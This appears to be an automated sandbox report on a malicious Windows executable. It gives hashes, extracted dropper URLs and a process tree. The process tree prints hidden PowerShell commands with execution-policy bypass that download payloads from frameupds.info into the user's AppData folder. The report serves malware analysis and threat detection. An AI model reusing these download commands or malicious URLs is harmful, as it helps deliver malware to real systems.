Resubmissions

27-11-2024 13:29

241127-qrb37svpcv 10

27-11-2024 09:27

241127-le54astrfj 10

Analysis

  • max time kernel
    119s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    27-11-2024 13:29

General

  • Target

    73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f.exe

  • Size

    212KB

  • MD5

    43b55685945d2cecc170b850cf622038

  • SHA1

    3b301a8a8a38dddd3cfb554b264342f9948102b0

  • SHA256

    73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f

  • SHA512

    ba08284c9c07150f68fc92be46cdf058caa0b6f9b25135cc2716c286efdbcfd59d79f5bf211260d900ac3fd8fe78b582010ae8985b2f240829c9b94020ae7a65

  • SSDEEP

    3072:DNDzKKCY4RZzOo8u2IJskwUu25iiik4l9ep6RHpm0/d2IK9EzB2tPNxBWg3facbN:pDGKClZl8P6KVRH83TtVf33bncxfq

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://frameupds.info/rwrw66/2222z.php

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://frameupds.info/rwrw66/1111z.php

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f.exe
    "C:\Users\Admin\AppData\Local\Temp\73ca5dd6d49b4c296ee1304aaac2e5fde01156800b538354fd27366df5b9323f.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2636
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Roaming\ewqeq.cmd
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2548
      • C:\Windows\system32\PING.EXE
        ping localhost -n 6
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:2732
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass $KRIIR = New-Object System.Net.WebClient; $KRIIR.Headers['User-Agent'] = 'Command'; $KRIIR.downloadfile('http://frameupds.info/rwrw66/2222z.php','C:\Users\Admin\AppData\Roaming\7za.exe');
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2820
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass $KRIIR = New-Object System.Net.WebClient; $KRIIR.Headers['User-Agent'] = 'Command'; $KRIIR.downloadfile('http://frameupds.info/rwrw66/1111z.php','C:\Users\Admin\AppData\Roaming\25520.7z');
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1924

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    4c662ba18260b73219076f55871b4c13

    SHA1

    344b3210bbf97d1c12126d32189773417997dd2b

    SHA256

    5c237ceac8a6f2fd6a42df0251fda839d5f20f02787addb1b627001310ce6325

    SHA512

    1028c4094d84420c32e5f2c4fc8e1f3fbccb17deca458849e5db7fd65d8056d54b03d899a697298b9da2960ddd049c4c1547853c36c133b3106510bca4804745

  • C:\Users\Admin\AppData\Roaming\ewqeq.cmd

    Filesize

    5KB

    MD5

    03868028bcd5c24c468e2c66571fb850

    SHA1

    c1dbed55b06bcc1b6a6211f7f8de592d92beb911

    SHA256

    c9bbb054e47836ee23efdb0c3d4ad193f7cbad635cfc9f2ba37da1d912a8b313

    SHA512

    d3527a2b639e694a2c4c9ab3279092f6e470a7e86b3bd5aff3fdfe63760eee2c4393f0b43067e6d922064fabef6c510008676cabb9031aaf3fbee4305ab6c999

  • memory/1924-18-0x000000001B760000-0x000000001BA42000-memory.dmp

    Filesize

    2.9MB

  • memory/1924-19-0x0000000002320000-0x0000000002328000-memory.dmp

    Filesize

    32KB

  • memory/2636-4-0x0000000001F50000-0x0000000001F60000-memory.dmp

    Filesize

    64KB

  • memory/2820-10-0x0000000002CE0000-0x0000000002D60000-memory.dmp

    Filesize

    512KB

  • memory/2820-11-0x000000001B630000-0x000000001B912000-memory.dmp

    Filesize

    2.9MB

  • memory/2820-12-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

    Filesize

    32KB